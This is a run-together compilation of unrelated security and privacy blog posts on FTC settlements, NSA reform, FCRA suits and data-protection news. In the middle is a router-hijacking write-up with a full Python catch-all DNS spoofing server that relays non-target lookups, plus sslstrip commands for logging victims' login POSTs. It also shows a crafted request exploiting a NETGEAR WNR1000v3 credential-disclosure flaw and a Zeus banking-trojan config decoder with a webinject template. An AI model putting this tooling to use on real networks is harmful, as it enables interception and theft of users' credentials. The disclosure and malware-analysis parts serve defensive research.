  • submit a compliance report to the FTC within 180 days;
  • notify the FTC of any changes in its structure that may affect its compliance with the settlement for 10 years;
  • create certain records (e.g., accounting and personnel records as well as consumer complaints and training materials) for 10 years, and retain each record created for five years; and
  • submit compliance reports to the FTC upon request.

In the press release accompanying the settlement, Jessica Rich, the Director of the FTC’s Bureau of Consumer Protection, stated that “[i]f [consumer reporting agencies] like TeleCheck provide merchants with inaccurate information, those merchants may wrongly deny consumers the ability to buy even the most essential items, like food and medicine.”

Read the FTC Business Center Blog’s post about the TeleCheck settlement. Read our previous coverage on 2013 FCRA class action settlements.

Interview with Peter Van Eeckhoutte, Special Guest Joel Yonts – Episode 358, Part 1 – January 16, 2014

Peter Van Eeckhoutte is the founder of Corelan Team and the author of the exploit writing tutorial series and of a number of free tools. He started working in IT and security in 1995, and currently works as a CISO.

Joel Yonts is a seasoned security executive with a passion for information security research. He has over 20 years of diverse Information Technology experience with an emphasis in Information Security. Joel is currently the Chief Information Security Officer for Advanced Auto Parts and maintains a blog at Malicious Streams.com.

President Obama Calls for Major Changes in National Security Surveillance Programs

In a major speech delivered at the U.S. Department of Justice on January 17, 2014, President Obama addressed the call for reforms to government surveillance programs following disclosures regarding National Security Agency (“NSA”) activities leaked by Edward Snowden since June of last year. The President discussed the need to advance national security while strengthening protections for privacy and civil liberties, improving transparency in intelligence programs, engaging in continual oversight and rebuilding trust among foreign leaders and citizens. He outlined several areas of reform:

  • A new Presidential Directive on domestic and overseas signals intelligence activity is intended to strengthen executive branch oversight and ensure that such activities take into account security, trade and investment relationships with foreign countries, as well as privacy and civil liberties. Under this Directive, the Administration would strengthen privacy protections for foreign leaders and citizens in connection with signals intelligence activities overseas.
  • Greater transparency in surveillance activity and improved safeguards for the privacy of U.S. persons. This includes the declassification of Foreign Intelligence Surveillance Court (“FISC”) opinions that have broad privacy implications, and a call to Congress to authorize the establishment of a panel of advocates from outside the government to argue significant cases before the FISC.
  • Reforms to activities conducted under Section 702 (i.e., the PRISM Program) that would place additional restrictions on the government’s ability to retain, search and use in criminal cases the communications of Americans that were collected incidentally pursuant to this law.
  • Amendments to the way in which the Department of Justice uses National Security Letters so that communications service providers may disclose to their customers that they were the subject of a National Security Letter after a fixed period of time, unless the government demonstrates a need for secrecy.
  • Changes that would allow communications service providers to make public more information about electronic surveillance orders that they have received from the government.
  • Significant reforms to the bulk collection of telephone metadata records under Section 215 of the USA PATRIOT Act. This program creates a database of phone numbers and the times and length of calls that can be queried when the government has a reasonable suspicion that a particular number is linked to a terrorist organization. The reforms would preserve the current program’s capabilities, but the government would not hold the bulk metadata. The President did not specify which institutions or industry would hold the data, and called on the Attorney General and the Director of National Intelligence to develop options for this new approach.
  • The designation of a senior state department officer to coordinate diplomacy on issues relating to technology and signals intelligence.
  • A comprehensive review of big data and privacy led by the White House.

The President’s speech portends a major shift in the role of industry in data collection activities relating to national security. If these reforms go through, industry will enjoy greater flexibility to share information about National Security Letters with affected customers, and to disclose information about electronic surveillance orders with the public. That said, industry also will take on a significant burden with respect to the retention of telephone and other records, which may be expensive and could have privacy and cybersecurity implications.

Ukraine Adopts New Data Protection Regulations

As reported by Bloomberg BNA, on January 13, 2014, Ukrainian Parliament Commissioner for Human Rights Valeriya Lutkovska (the “Ombudsman”) announced the adoption of new data protection regulations. The Ombudsman became the new data protection authority in Ukraine as of January 1, 2014, when amendments to abolish the previous data protection authority became effective. As we previously reported, Ukraine first passed personal data protection legislation in June 2010.

The new data protection regulations require data controllers to (1) notify data subjects of the processing of their personal data within 30 working days, and (2) notify the Ombudsman of the processing of “high risk data” that constitute a special risk to the rights and freedoms of data subjects. The Ombudsman may issue warnings to data controllers for failure to notify the Ombudsman of the processing of “high risk data.” In addition, the new data protection regulations provide for monitoring and audit compliance procedures pursuant to which the Ombudsman may conduct announced and unannounced audits.

FTC Settles with Apple for Kids’ In-App Purchases

On January 15, 2014, the Federal Trade Commission announced a proposed settlement with Apple Inc. stemming from allegations that the company billed consumers for mobile app charges incurred by children without their parents’ consent. Specifically, the FTC’s complaint alleges that Apple violated the FTC Act by not informing account holders that, for a 15-minute window after entering their password to approve a single in-app purchase, their children could make unlimited purchases without further action by the parent.

Apple agreed to pay a minimum of $32.5 million to provide refunds to consumers. To the extent not all of the $32.5 million is refunded to eligible account holders, the balance will be deposited into a fund to be administered by the FTC. According to the Order, the fund can then be used for equitable relief at the FTC’s discretion. The company will be required to change its billing practices no later than March 31, 2014 to ensure that it has obtained express, informed consent from consumers prior to billing them for in-app charges. Apple also must give consumers the option to withdraw their consent for future charges at any time.

The FTC vote to accept the consent agreement package was 3-1, with Commissioner Joshua Wright issuing a dissenting statement. Chairwoman Edith Ramirez and Commissioner Julie Brill issued a joint statement, and Commissioner Maureen Ohlhausen issued a separate statement.

This settlement follows an increased focus by the FTC on mobile technology issues: in March 2013, the FTC released a report on key consumer and privacy issues resulting from the increasingly widespread use of mobile payments; in February 2013, the FTC issued recommendations for transparency in mobile privacy disclosures; and in December 2012, the FTC expressed concern regarding privacy disclosures on mobile applications for kids.

The settlement with Apple is open for public comment until February 14, 2014.

Update: On March 27, 2014, the FTC approved the final settlement order with Apple.

UK High Court Rules in Cookies Claim Against Google

On January 16, 2014 the High Court in London rejected submissions made on behalf of Google Inc. (“Google”) that the case brought against it by three UK-based users of Apple’s Safari browser should be heard in the U.S., rather than before an English court. The decision means that the case could be heard before a court in England, although media reports suggest Google will appeal the decision.

The claims against Google arise from the placing of cookies on Apple devices used by the three individuals, resulting in the generation of targeted advertising.

Google is a U.S. corporation registered in Delaware and its principal place of business is in California. The general rule regarding court jurisdiction is that, when the potential defendant is based in the U.S., civil cases must be brought before the U.S. courts, even where those bringing the case are based in another jurisdiction. However, in a limited set of circumstances, English courts are prepared to accept jurisdiction over a case and allow the claimants to serve court papers on a potential defendant outside the jurisdiction. Service of the papers is the first step in having the case heard before an English court.

In order to be allowed to serve the papers outside the UK, the claimants had to convince the High Court that:

  • the claims being made against Google could be classified as torts under English law, and that either damage was sustained by the claimants in the UK or damage resulted from an act committed within the UK;
  • there is a serious issue to be tried on the merits of the claim; and
  • taking all the circumstances into account, the appropriate forum to resolve the dispute would be an English court.

The High Court accepted that the claims being made amounted to the alleged tort of misuse of private information under English law and the alleged breach of the UK Data Protection Act 1998, and that in the three cases before the Court the issues were sufficiently serious to merit trial. The court held that the most appropriate forum would be an English court for the following reasons: (1) the focus of the case would be on the damage that the UK residents claim to have suffered, such that proceedings in the U.S. would be burdensome to them, and (2) the issues of English law raised by the case are complicated and would be costly and difficult to resolve in a U.S. court.

Criminal Background Checks: Reviewing the Year in FCRA Class Action Settlements

As reported in the Hunton Employment & Labor Perspectives Blog:

While much attention has been paid this year to the Equal Employment Opportunity Commission’s (“EEOC’s”) agenda and litigation over criminal background checks (the agency asserts such background checks have a disparate impact on minority groups), a parallel challenge kept pace in the form of private class action litigation under the Fair Credit Reporting Act (“FCRA”). 2013 saw a number of significant class action settlements against both employers and consumer reporting agencies (“CRAs”) for alleged violations of the FCRA in the use of criminal background checks:

  • Pitt v. K-Mart Corp., Case No. 11-cv-00697 (E.D. Va.): plaintiff’s October 2011 class action complaint alleged that K-Mart willfully violated the FCRA prior to obtaining consumer reports and prior to taking adverse actions against the class. In January 2013, parties reached a $3 million settlement, which received final approval from the court on May 24, 2013.
  • Singleton v. Domino’s Pizza LLC, 8:11-cv-01823-DKC, — F. Supp. 2d — (D. Md. Oct. 2, 2013): in this class action complaint, filed in July 2011, plaintiffs alleged that the consent form Domino’s used for procuring a consumer report violated the FCRA and that Domino’s took adverse actions against applicants without providing the required notices prior to the adverse action being taken. The matter settled in March 2013, and was subsequently approved in October 2013. Under the terms of the settlement, Domino’s agreed to pay $2.5 million into a settlement fund, from which plaintiffs’ counsel’s 25% fee award would be taken.
  • Bell v. U.S. Xpress, Inc., 1:11-cv-00181-CLC-WBC (E.D. Tenn.): plaintiff alleged that, after applying with U.S. Xpress, defendant did not ask him if the company could obtain a consumer report as part of the application process, that defendant’s decision not to hire plaintiff was based, in part, on erroneous information in the report, and that plaintiff did not receive notice until after the decision was made, all in violation of the FCRA. In April 2013, defendant settled the class action lawsuit for $2.75 million.
  • Johnson v. Midwest Logistics Systems, Ltd., Case No. 2:11-cv-01061-ALM-TPK (S.D. Ohio): plaintiff in this purported class action alleged that he was hired by defendant, pending a successful criminal background check, but that he did not receive a stand-alone consent form, as required under the FCRA, that his consumer report was inaccurate, and he was denied the position without the proper notices. The case settled in May 2013, and Midwest agreed to pay $452,380.00.
  • Roe v. Intellicorp Records, Inc., Civ. No. 1:12CV2288-JG (N.D. Ohio): in this consolidated class action, plaintiffs accused two CRAs of providing inaccurate criminal background reports to employers that caused the class of applicants to suffer adverse actions, and of not notifying them at the time defendants provided the consumer reports to prospective employers. The case settled on November 12, 2013, when defendants agreed to pay $18.6 million to settle the FCRA claims.

2013 also has seen a number of new FCRA class action lawsuits, including a high-profile lawsuit filed against the Walt Disney Company, as well as class actions against two different national transportation and trucking companies, a national home improvement retailer, a broadcast company, and several large CRAs. It seems clear that the trends in FCRA litigation will continue. Thus, while employers may be focused on potential disparate impact claims based on the use of criminal background checks, they also should evaluate exposure to the companion risk that comes with criminal background check practices – class action claims under the Fair Credit Reporting Act.

Senators Renew Efforts to Pass Data Privacy Legislation

On January 8, 2014, Senator Patrick Leahy (D-VT), Chair of the U.S. Senate Judiciary Committee, reintroduced the Personal Data Privacy and Security Act of 2014, comprehensive information security legislation that would establish a national standard for data breach notification and require businesses to safeguard customers’ sensitive personal information from cyber threats. The bill also would establish criminal penalties for individuals who intentionally or willfully conceal a security breach involving personal data when the incident causes economic damage to consumers.

Senator Leahy first introduced the Personal Data Privacy and Security Act in 2005, and he has reintroduced the legislation in each of the previous four Congresses. Key provisions in the bill include:

  • criminal penalties for individuals who intentionally or willfully conceal a security breach involving personal data when the breach causes economic damage to consumers;
  • a requirement for companies that maintain personal data to establish and implement internal policies to protect data privacy and security; and
  • an update to the Computer Fraud and Abuse Act to make attempted computer hacking and conspiracy to commit computer hacking punishable under the same criminal penalties as the underlying offense.

The bill also authorizes the Federal Trade Commission to write and enforce rules requiring companies to protect “personally identifiable information” and to notify consumers in the event of a breach. Violators could face up to $500,000 in civil penalties. The FTC currently lacks explicit congressional authority in this area; data security cases are pursued under Section 5 of the FTC Act, which prohibits “unfair and deceptive” trade practices.

Senator Leahy announced that the issue of data privacy would be the subject of a Judiciary Committee hearing early in the new Senate session. Senator Deb Fischer (R-NE) also called for Congressional action on data security, urging the Senate Committee on Commerce, Science, and Transportation, on which she sits, to take up the issue.

Interview with Ian Iamit, SANS SIFT with Rob Lee – Episode 357, Part 1 – January 9, 2014

Ian Iamit is currently serving as a Director of Services at the leading boutique security consulting company IOActive, where he leads the services practice in the EMEA region. He is one of the founders of the Penetration Testing Execution Standard (PTES), its counterpart – the SexyDefense initiative, and a core member of the DirtySecurity crew.

Rob Lee is an entrepreneur and consultant in the Washington, DC area, specializing in information security, incident response, and digital forensics. Rob is currently the curriculum lead and author for digital forensic and incident response training at the SANS Institute in addition to owning his own firm.

MIT(R)M Attacks – Your middle or mine?

Introduction

Recently (actually months ago now) my wife went out to see some friends from church, which left me with a couple of hours to kill at home (after I put the kids to bed, of course). I decided to use this opportunity to look for security vulnerabilities in the wireless router provided by my ISP.

I installed the latest firmware update on the device and soon discovered a serious vulnerability in the router's password recovery feature (when exploited, it discloses the router's admin username and password in cleartext).

Note: At this point some of you might be thinking... siiiiiigghhhhhhh... "so a consumer-grade wireless router has a security vulnerability... what's new... most home users don't bother changing the default username and password anyway"... right, but stay with me, it gets better.

I didn't have much time to contact the vendor directly, so I decided to write up a description and send it off to Secunia. After several days I received back the following response:

We have received your report regarding <censored> wireless
router. But, unfortunately, we are not able to consider it as a SVCRP [1]
report as we do not have said device on our premises and subsequently cannot
confirm the vulnerability within our secure test environment.

Therefore, we will not process this report. In case you would like these
issues to be addressed by the vendor, we would like to encourage you to
report them to the vendor directly.

Thank you for reporting this to us though. We look forward to receiving more
reports from you.


What!? Hmmmmm... you know they sell these at Walmart, right? Well, you can't really blame Secunia; what can you really do with admin access to a home wireless router anyway? Well... let's take a look.

Before we delve into this further I should note that I attempted desperately to report the vulnerability to the vendor directly. This process was soooooo insanely difficult that it actually drove me to about 18 seconds of maniacal laughter. I seriously don't know if the internal communication was just horrible (I actually started getting emails back from the vendor addressing me as "Ms. Difrank"), or if they just DO NOT CARE!

There are actually many different attack vectors that can be leveraged once you compromise a home wireless router (or any router), but in the interest of brevity I just want to discuss one that hasn't been given enough attention (IMO).

Typically, Man-in-the-Middle (MITM) attacks are launched from "close" range, on the same local network as the victim. One has to ask, though: where exactly is the "middle"? Without getting too philosophical, I'm going to suggest that the "middle" is relative... it can be any point between the source and the destination.

With that said, let's see how we can launch a Man-in-the-Relative-Middle attack against users connected to a home wireless router from anywhere in the "middle" (even over the Internet).

Note: This example focuses on intercepting HTTP/S traffic only.

Configure A Malicious DNS Server

First, I configure my laptop as a DNS server that answers every DNS request with my laptop's IP address. There are many different ways/tools to do this, but for this demo I decided to use a simple BIND configuration: a zone for the root domain whose records all point at my laptop, so there is no name it won't claim.

Note: I don't recommend this catch-all technique in an actual pentest; answering every lookup with your own IP breaks everything else the victim does on the network and gets noticed fast. It's better to target specific domains (facebook, linkedin, google, etc.) and let every other query resolve normally.

1.) Add a new entry into your named.conf.local file for the "root" domain



2.) Setup a new zone file for the root domain (in this case "db.any") and copy it to the directory specified within your named.conf.options


After restarting the BIND service, any DNS request submitted to the server returns the IP address of the attacking system (in this case 192.168.1.10).


Note: I'm using an IP address on the local LAN; when launching this attack over the Internet you would configure this with your public IP (and the attacking host has to be reachable on UDP/53 and TCP/80 from the victims' side).
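For readers who would rather see the wire format than a BIND zone file, here is the same catch-all resolver as a small Python UDP responder. It is an added example, not the author's configuration: every A query it receives is answered with the attacking IP, and, following the note above about targeting specific domains, an optional suffix list limits the spoofing to chosen domains while everything else is relayed to a real resolver. The 8.8.8.8 upstream, the function names and the 60-second TTL are this example's assumptions.

```python
"""Catch-all DNS responder (added example; stands in for the BIND root zone).

Every A/IN query is answered with attacker_ip. With spoof_suffixes set, only
names under those domains are spoofed and the rest are relayed upstream
(8.8.8.8 here is an assumption) so the victim's other lookups keep working.
"""
import socket
import struct
import sys

A_RECORD, IN_CLASS = 1, 1


def parse_query(packet):
    """Return (txid, qname, qtype, qclass, raw_question) from a DNS packet."""
    txid, _flags, qdcount = struct.unpack_from("!HHH", packet, 0)
    if qdcount < 1:
        raise ValueError("no question section")
    labels, off = [], 12                       # question starts right after the 12-byte header
    while True:
        length = packet[off]
        off += 1
        if length == 0:
            break
        if length & 0xC0:                      # compression pointer: never valid in a query name
            raise ValueError("compressed name in question")
        labels.append(packet[off:off + length].decode("ascii"))
        off += length
    qtype, qclass = struct.unpack_from("!HH", packet, off)
    off += 4
    return txid, ".".join(labels).lower(), qtype, qclass, packet[12:off]


def build_response(packet, attacker_ip, spoof_suffixes=None, ttl=60):
    """Answer an A query with attacker_ip; None means 'not a target, relay it'.

    spoof_suffixes is a set of lower-case domains ({"facebook.com"}) or None for all.
    """
    txid, qname, qtype, qclass, question = parse_query(packet)
    if spoof_suffixes is not None and not any(
            qname == s or qname.endswith("." + s) for s in spoof_suffixes):
        return None
    # flags 0x8180: QR=1 (response), RD=1, RA=1, RCODE=0 (NOERROR)
    if qtype != A_RECORD or qclass != IN_CLASS:
        # not an A/IN question: return an empty NOERROR answer instead of lying
        return struct.pack("!HHHHHH", txid, 0x8180, 1, 0, 0, 0) + question
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    # 0xC00C is a compression pointer to the name at offset 12, i.e. the question name
    answer = struct.pack("!HHHIH", 0xC00C, A_RECORD, IN_CLASS, ttl, 4)
    return header + question + answer + socket.inet_aton(attacker_ip)


def build_query(name, txid):
    """Minimal recursive A/IN query; used to construct test traffic offline."""
    qname = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split("."))
    return (struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
            + qname + b"\x00" + struct.pack("!HH", A_RECORD, IN_CLASS))


def answer_ips(response):
    """Pull the A-record addresses out of a response (enough to check our own)."""
    ancount = struct.unpack_from("!H", response, 6)[0]
    question = parse_query(response)[4]
    off, ips = 12 + len(question), []
    for _ in range(ancount):
        _name, rtype, _rclass, _ttl, rdlen = struct.unpack_from("!HHHIH", response, off)
        off += 12
        if rtype == A_RECORD and rdlen == 4:
            ips.append(socket.inet_ntoa(response[off:off + 4]))
        off += rdlen
    return ips


def serve(listen_ip, attacker_ip, spoof_suffixes=None, upstream="8.8.8.8"):
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((listen_ip, 53))                   # port 53 needs root / CAP_NET_BIND_SERVICE
    while True:
        packet, client = sock.recvfrom(512)
        try:
            reply = build_response(packet, attacker_ip, spoof_suffixes)
        except (ValueError, IndexError, UnicodeDecodeError, struct.error):
            continue                             # malformed packet: drop it silently
        if reply is None:                        # not a target: relay so browsing keeps working
            relay = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            relay.settimeout(3)
            try:
                relay.sendto(packet, (upstream, 53))
                reply, _ = relay.recvfrom(4096)
            except socket.timeout:
                continue
            finally:
                relay.close()
        sock.sendto(reply, client)


if __name__ == "__main__":
    # usage: python dns_spoof.py <listen ip> <attacker ip> [domain ...]
    targets = set(d.lower() for d in sys.argv[3:]) or None
    serve(sys.argv[1], sys.argv[2], targets)
```

Run it with no domain arguments to reproduce the catch-all zone from the post, or list the domains you actually want to intercept to keep the victim's other traffic (and your footprint) normal.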

Configure sslstrip

Most sensitive information that traverses the web nowadays is encrypted using SSL/TLS. Rather than configuring an inline proxy server to intercept HTTP/S requests (which will work, but generates certificate errors on the client), I've decided to use one of my favorite tools: "sslstrip". It never presents a bogus certificate; it talks HTTPS to the real server and plain HTTP to the client, so there is nothing for the browser to warn about. The catch is that sites the browser already knows as HTTPS-only (HSTS, or a preloaded list) can't be stripped, because the browser never makes the plain HTTP request sslstrip depends on.

Note: If you aren't familiar with sslstrip I encourage you to take a look here

Typically we would use sslstrip together with IP forwarding, ARP spoofing and port redirection on the local LAN (which is what it was designed for), but it also works pretty well just by starting it and sending web traffic directly to it.

Start sslstrip: 
sslstrip -l 80 -p -w sslposts.txt


This configures sslstrip to listen on TCP port 80 (-l 80), log only the POSTs that would have gone over SSL (-p) and write them to the file sslposts.txt (-w).

Monitor HTTP POSTs:
tail -f sslposts.txt

Now that our server is configured, we simply modify the DNS settings on the WAN interface of our target router to point to our malicious server IP. LAN clients normally get the router itself as their resolver via DHCP, and the router forwards their lookups to whatever is configured on its WAN side, so from this point on every name the victims resolve comes from us.

Every hostname now resolves to our box, so the browser's plain-HTTP request lands on sslstrip, which fetches the real site over HTTPS and hands back an HTTP-only copy with the https:// links rewritten. The result is that HTTPS pages are transparently replaced with HTTP pages, as long as the victim starts out on an http:// URL (a typed https:// address goes to port 443, where nothing of ours is listening). There is much more going on under the hood, but I want to keep this short and sweet.



The login credentials can be seen in the HTTP POST log:



Ok...but how do we change the DNS settings in the router?

Home Internet routers are notorious for security vulnerabilities. Let's take a look at the one I discovered and reported back in April 2013 (still unpatched today).

The vulnerability I discovered affects NETGEAR N150 wireless routers identified as WNR1000v3. A flaw in the password recovery feature of this device allows an attacker to retrieve the router administrator username and password in cleartext.

Note: The router is vulnerable EVEN IF PASSWORD RECOVERY IS DISABLED!

I wrote a quick proof-of-concept script that extracts the username and password from a vulnerable router. I named the script "wnroast" since WNR sounds like "wiener"  to me   :)

wnroast.py <target ip> <target port>

Roasting the WNR:


Doing a Shodanhq search for WNR1000v3 reveals almost 14,000 hits (those are devices whose admin interface answers on the Internet, i.e. remote administration is enabled). Imagine a scenario where an exploit for this vulnerability is scripted and hundreds of devices begin using malicious DNS servers; the impact would be severe.

Again, MITRM represents only one of MANY attack vectors that may be taken once an attacker gains control of a home Internet router.

I should also mention that tools like sslstrip aren't really designed to be used across the Internet like this, so you will notice some pages don't load right, or at all, without additional customization.

There is certainly much more that could be said on this topic, but I'm out of time and I need to wrap this up.

In Closing:

The following are some recommendations to consider when securing administration access to your home Internet router.

  1. Disable remote administration access (over the web) or at least restrict it to trusted IPs only
  2. Whenever possible, disable access to the administration page from the wireless LAN (wired only)
  3. Check the DNS servers configured on the router's WAN interface now and then; a resolver you didn't set is the tell-tale sign of exactly the attack described above

That's all the time I've got at this point; let's hope this gets patched soon!

Special thanks to wildB1ll for helping me test this out!


WNRoast Download:

wnroast.py can be downloaded here

Update (7-5-14): Metasploit aux mod available here

Full Disclosure Details:


The following is my original submission to Secunia and NETGEAR disclosing the details of the vulnerability:

Description: Newer firmware versions of the NETGEAR N150 WNR1000v3 wireless router are affected by a password recovery vulnerability. Exploiting this vulnerability allows an attacker to recover the router's (plaintext) Administrator credentials and subsequently gain full access to the device. This vulnerability can be exploited remotely if the remote administration access feature is enabled (as well as locally via wired or wireless access).
Tested Device Model: NETGEAR N150 WNR1000v3
Tested Device Firmware Versions: V1.0.2.60_60.0.86 (Latest) and V1.0.2.54_60.0.82NA
Potential Impacts: Gaining full control over a wireless router exposes multiple attack vectors including: DoS, DNS control (many ways this can be leveraged to exploit clients), access to PPPoE credentials, cleartext WPA/WPA2 PSK (for guest and private network), firewall rule and port forwarding manipulation, etc.
Overview:
The password recovery mechanism appears to be designed to work as follows:
1.) After failing to login the user will be redirected to a password recovery page that requests the router serial number
2.) If the user enters the serial number correctly, another page will appear that requires the user to correctly answer 2 secret questions
3.) If the user answers the secret questions correctly, the router username and password is displayed
The problem: The implementation of this password recovery method has issues...lots of issues
Vulnerability and Exploit Details:
1.) Access the router login through a web browser: http://192.168.1.1
2.) Select "Cancel" on the HTTP basic login box (or enter arbitrary credentials), the router responds with the following (Note the "unauth.cgi?id" parameter):
----------------------------------------------------------------------------------------------

HTTP/1.0 401 Unauthorized
WWW-Authenticate: Basic realm="NETGEAR WNR1000v3"
Content-type: text/html

<html>
<head>
<meta http-equiv='Content-Type' content='text/html; charset=utf-8'>
<title>401 Unauthorized</title></head>
<body onload="document.aForm.submit()"><h1>401 Unauthorized</h1>
<p>Access to this resource is denied, your client has not supplied the correct authentication.</p><form method="post" action="unauth.cgi?id=78185530" name="aForm"></form></body>
</html>
-------------------------------------------------------------------------------------------------
3.) Use the unauth.cgi ID parameter to send the following (crafted) HTTP post request:
-------------------------------------------------------------------------------------------------
POST http://192.168.1.1/passwordrecovered.cgi?id=78185530 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 192.168.1.1
Content-Length: 35
Connection: Keep-Alive
Pragma: no-cache

-------------------------------------------------------------------------------------------------
The username and (plaintext) password are returned in the response (truncated for brevity):
-------------------------------------------------------------------------------------------------
...
<tr>
 <td class="MNUText" align="right">Router Admin Username</td>
 <td class="MNUText" align="left">admin</td>
 </tr>
 <tr>
 <td class="MNUText" align="right">Router Admin Password</td>
 <td class="MNUText" align="left">D0n'tGuessMe!</td>
 </tr>
...
-------------------------------------------------------------------------------------------------

Decoding Zeus 2.9.6.1 dynamic config

I got a look at the Zeus builder that was released by the MMBB guy on exploit.in and finally decided to write something about it, so let's talk about the change in the config encryption.
MD5: 0a05783316e7f765e731aadf5098564f

This version uses AES instead of RC4 and can interact with the latest version of Firefox.
Anyway, it's nothing more than a basic Zeus v2.

iBank parser on the panel, monitoring of process:
About the panel: the released version requires the ionCube loader (never mind, the gate code can be recovered easily).

Now let's look at an example report from the modules, keylog + screenshot:


Part of the static config (in the clear in the generated bot):

Installation process/dynamic config decoding (beware, dubstep):

And a small piece of code, because it's easier to understand:
<?php
    // Needs the mcrypt extension (PHP 5.x). The config is AES-128 in ECB mode,
    // keyed with the raw MD5 digest of the builder passphrase.
    function decode($data, $key) {
        $td = mcrypt_module_open(MCRYPT_RIJNDAEL_128, '', MCRYPT_MODE_ECB, '');
        // ECB has no chaining, so the IV is ignored; mcrypt_generic_init()
        // still wants one of the right size.
        $iv = mcrypt_create_iv(mcrypt_enc_get_iv_size($td), MCRYPT_RAND);

        mcrypt_generic_init($td, $key, $iv);

        // Input must be a multiple of 16 bytes (the builder pads the config).
        $data = mdecrypt_generic($td, $data);

        mcrypt_generic_deinit($td);
        mcrypt_module_close($td);

        return $data;
    }

    // Undo the Zeus "visual encryption": each byte was XORed with the byte
    // before it, so walk backwards and XOR with the still-encoded predecessor.
    function visualDecrypt(&$data) {
        $len = strlen($data);

        if ($len > 0)
            for ($i = $len - 1; $i > 0; $i--)
                $data[$i] = chr(ord($data[$i]) ^ ord($data[$i - 1]));
    }

    $data    = file_get_contents('config.bin');
    $key     = md5('hasd7h12g1', true);   // raw (binary) digest = 16-byte AES key
    $decoded = decode($data, $key);

    visualDecrypt($decoded);

    $size = strlen($decoded);

    // Serve the decoded config as a file download.
    header('Content-Type: application/octet-stream;');
    header('Content-Transfer-Encoding: binary');
    header('Content-Length: ' . $size);
    header('Content-Disposition: attachment; filename=config_decrypted.dll');
    header('Expires: 0');
    header('Cache-Control: no-cache, must-revalidate');
    header('Pragma: no-cache');

    echo($decoded);

    exit;
?>
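The same two steps as a stand-alone Go tool, added here as an example and not the author's code: the AES-128-ECB decrypt with the MD5-derived key, then the visual-decrypt XOR chain, with a block-alignment check so a truncated or non-AES blob is rejected instead of producing garbage. The passphrase is the one from the PHP snippet above; the file name decode.go is assumed.

```go
package main

import (
	"crypto/aes"
	"crypto/md5"
	"fmt"
	"os"
)

// DeriveKey mirrors md5('hasd7h12g1', true) in the PHP snippet: the raw 16-byte
// MD5 digest of the builder passphrase is used directly as the AES-128 key.
func DeriveKey(passphrase string) []byte {
	sum := md5.Sum([]byte(passphrase))
	return sum[:]
}

// VisualDecrypt undoes the Zeus "visual encryption": every byte was XORed with the
// byte before it, so walk backwards and XOR with the still-encoded predecessor.
func VisualDecrypt(data []byte) {
	for i := len(data) - 1; i > 0; i-- {
		data[i] ^= data[i-1]
	}
}

// DecodeConfig is the analyst-side path: AES-128-ECB decrypt, then VisualDecrypt.
// ECB has no chaining (hence the ignored IV in the PHP), so blocks are independent.
func DecodeConfig(blob []byte, passphrase string) ([]byte, error) {
	if len(blob) == 0 || len(blob)%aes.BlockSize != 0 {
		return nil, fmt.Errorf("length %d is not a multiple of %d: not an AES-ECB blob", len(blob), aes.BlockSize)
	}
	block, err := aes.NewCipher(DeriveKey(passphrase))
	if err != nil {
		return nil, err
	}
	out := make([]byte, len(blob))
	for off := 0; off < len(blob); off += aes.BlockSize {
		block.Decrypt(out[off:off+aes.BlockSize], blob[off:off+aes.BlockSize])
	}
	VisualDecrypt(out)
	return out, nil
}

// Usage: go run decode.go config.bin > config_decrypted.bin
func main() {
	blob, err := os.ReadFile(os.Args[1])
	var out []byte
	if err == nil {
		out, err = DecodeConfig(blob, "hasd7h12g1") // passphrase used by this build
	}
	if err != nil {
		fmt.Fprintln(os.Stderr, "decode:", err)
		os.Exit(1)
	}
	os.Stdout.Write(out)
}
```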

You can find the decoded modules here:
JAVA: 7d7ae6ffbd9f3c7673b339f9b94493e5
BSS: cc98dabebe047c6115a6cd9d13ed3122
KEYLOG: 8ac1c7c019d16ff3b8a9543d46ae5e0e

And if you want to test the WebInject yourself, I usually use this code:
set_url http://requesttests.appspot.com* GP
data_before
</body>
data_end

data_inject
<center><img src="http://temari.fr/webinject.png" alt="Injected!"></center>
data_end

data_after
data_end

/facepalm

FTC Approves COPPA Parental Consent Mechanism Proposal

On December 23, 2013, the Federal Trade Commission announced that it accepted a proposed mechanism, submitted by Imperium, LLC (“Imperium”), to obtain verifiable parental consent in accordance with the Children’s Online Privacy Protection Rule (the “COPPA Rule”) that came into effect July 1, 2013.

The COPPA Rule requires operators of certain websites and online services to obtain a parent’s consent before collecting personal information online from a child under the age of 13. In addition to the acceptable methods for obtaining the required parental consent listed in the COPPA Rule, the FTC’s recent revisions also allow entities to propose their own parental consent mechanisms for approval by the Commission. On September 9, 2013, the FTC announced that it had received a proposal from Imperium and invited public comment on the proposed mechanism.

In its letter to Imperium, the FTC stated that Imperium’s method of knowledge-based authentication (“KBA”) is an acceptable method of obtaining verifiable parental consent as it is “reasonably calculated. . . to ensure that the person providing consent is the child’s parent.” KBA allows an individual to demonstrate that he or she is the relevant child’s parent by answering a series of challenge questions. The FTC noted that, to obtain verifiable parental consent, the challenge questions must be (1) structured so the probability of correctly guessing the answers is low, and (2) sufficiently sophisticated so that a child age 12 or under “could not reasonably ascertain the answers.”

In approving Imperium’s proposed parental consent mechanism, the FTC noted that “financial institutions and credit bureaus . . . have used KBA to authenticate users for many years” and that the FTC and other government agencies, such as the Federal Financial Institutions Examination Council, have previously acknowledged the efficacy of KBA. In November 2013, the FTC rejected a proposed parental consent mechanism submitted by a different company stating that the company failed to provide sufficient “relevant research” and “marketplace evidence” that its proposed mechanism would ensure that the person providing consent is the child’s parent. Accordingly, it appears that future proposals are more likely to be approved if they employ a mechanism that has a history of success and acceptance by industry and government in other identity verification scenarios.

View the FTC’s letter to Imperium.

Troj/WowSpy-A

Recently, a piece of malware that targets World of Warcraft was identified.
This threat is known as Disker, Mal/DllHook-A or Trojan.Siggen5.64266 and can steal player accounts even if they use a Battle.net Authenticator.
Yes, this is another post about password-stealer malware...

There is no option to retain password on the WoW client.

This malware is spread through fake websites that lead to a malicious download.
The Trojan is bundled with legitimate programs such as WowMatrix or Curse Client, which players use to manage their AddOns.

Malicious Wowmatrix installer. (DCDD6986941B2B4E78A558CAB3ACF337)

Fake sites:
